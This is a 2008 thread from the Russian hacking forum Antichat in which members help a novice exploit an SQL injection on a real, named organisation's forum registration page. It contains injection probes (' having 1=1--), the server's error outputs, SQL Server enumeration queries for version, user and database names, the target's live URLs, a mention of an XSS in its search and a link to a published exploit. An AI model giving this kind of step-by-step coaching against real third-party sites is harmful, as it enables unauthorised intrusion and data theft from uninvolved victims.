ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1611  
Старый 09.04.2008, 17:42
Аватар для ettee
ettee
Administrator
Регистрация: 12.10.2006
Сообщений: 466
Провел на форуме:
17234747

Репутация: 5170
По умолчанию

Поправлю Scipio, не только IE, на данный момент все браузеры на Gecko( FF =>2.0.0.5 ), Opera =>9.50 beta, IE =>6(path). PHP =>5.2, по умолчанию метод TRACE уставновлен в положение on(IIS/Apache), плюс все публичные примеры обхода HTTP TRACE основаны при использование ActiveX компонентов, что не поддерживается( при стандартных компонентах ) FF и Оперой, зато присутствует XMLHTTPRequest.

 
Ответить с цитированием

  #1612  
Старый 09.04.2008, 21:24
Аватар для SQL~In[J]ecTi0n
SQL~In[J]ecTi0n
Познающий
Регистрация: 07.03.2008
Сообщений: 41
Провел на форуме:
572900

Репутация: 17
Post

Добрый вечер,подскажите как реализовать уязвимость:

1.найден уязвимый параметр login при регистрации,
ввожу ' выдаётся следующее:

Код:
Microsoft OLE DB Provider for SQL Server error '80040e14' 

Unclosed quotation mark before the character string '''. 

/forums/Advising/register.asp, line 49
2.ввожу
Код:
' having 1=1--
в уязвимое поле.
Выдаётся:

Код:
Microsoft OLE DB Provider for SQL Server error '80040e14' 

Column 'members.M_Name' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. 

/forums/Advising/register.asp, line 49
т.е. я узнал,что имя таблицы: "members", а имя первой колонки: "M_Name"???

Что делать дальше?

Последний раз редактировалось SQL~In[J]ecTi0n; 09.04.2008 в 21:31..
 
Ответить с цитированием

  #1613  
Старый 09.04.2008, 21:41
Аватар для xcedz
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

узнай версию SELECT @@version
имя текущего юзверя например
select user_name();
slect user;
select system_user();
mmm... еще select DB_NAME() - имя базы

ну или апишку select host_name() ... хз )))

http://msdn2.microsoft.com/en-us/library/ms173768.aspx

а что это единственное место где тебе ошибки выдает?

Последний раз редактировалось xcedz; 09.04.2008 в 21:44..
 
Ответить с цитированием

  #1614  
Старый 09.04.2008, 21:46
Аватар для SQL~In[J]ecTi0n
SQL~In[J]ecTi0n
Познающий
Регистрация: 07.03.2008
Сообщений: 41
Провел на форуме:
572900

Репутация: 17
По умолчанию

to xcedz

Не катит...)

Да,единственное,вроде...
 
Ответить с цитированием

  #1615  
Старый 09.04.2008, 21:49
Аватар для xcedz
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

ет чтоли? http://www.amideast.org/forums/advising/register.asp?mode=doit )))))
 
Ответить с цитированием

  #1616  
Старый 09.04.2008, 21:52
Аватар для SQL~In[J]ecTi0n
SQL~In[J]ecTi0n
Познающий
Регистрация: 07.03.2008
Сообщений: 41
Провел на форуме:
572900

Репутация: 17
По умолчанию

to xcedz

да))

P.S. Еще в форме поиска такая же байда.Ток что нашел)

Знаешь,что дальше делать?
 
Ответить с цитированием

  #1617  
Старый 09.04.2008, 21:57
Аватар для xcedz
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

http://amideast.org/Pubs_one/products.aspx?skunumb=

ОПА.. размышляем дальше а говорил тока там ошибку выдает ...
 
Ответить с цитированием

  #1618  
Старый 09.04.2008, 22:02
Аватар для SQL~In[J]ecTi0n
SQL~In[J]ecTi0n
Познающий
Регистрация: 07.03.2008
Сообщений: 41
Провел на форуме:
572900

Репутация: 17
По умолчанию

Если честно,то мои рассуждения дальше пока не идут,опыта и знаний маловато,так что прошу помочь...
 
Ответить с цитированием

  #1619  
Старый 09.04.2008, 22:14
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от xcedz  
http://amideast.org/Pubs_one/products.aspx?skunumb=

ОПА.. размышляем дальше а говорил тока там ошибку выдает ...
ОПА..Размышления зашли в тупик.Это сообщение о пустом параметре, а не дырка в безопасности
А в логине ограничение на 50 символов нормальный запрос не воткнёшь

Последний раз редактировалось jokester; 09.04.2008 в 22:17.. Причина: дополнение
 
Ответить с цитированием

  #1620  
Старый 09.04.2008, 22:27
Аватар для xcedz
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

Цитата:
ОПА..Размышления зашли в тупик.Это сообщение о пустом параметре, а не дырка в безопасности
о каких дырках ретчь? гг к стате есть пассивная xss в поиске

или даже так http://milw0rm.com/exploits/3965

Последний раз редактировалось xcedz; 09.04.2008 в 22:41..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ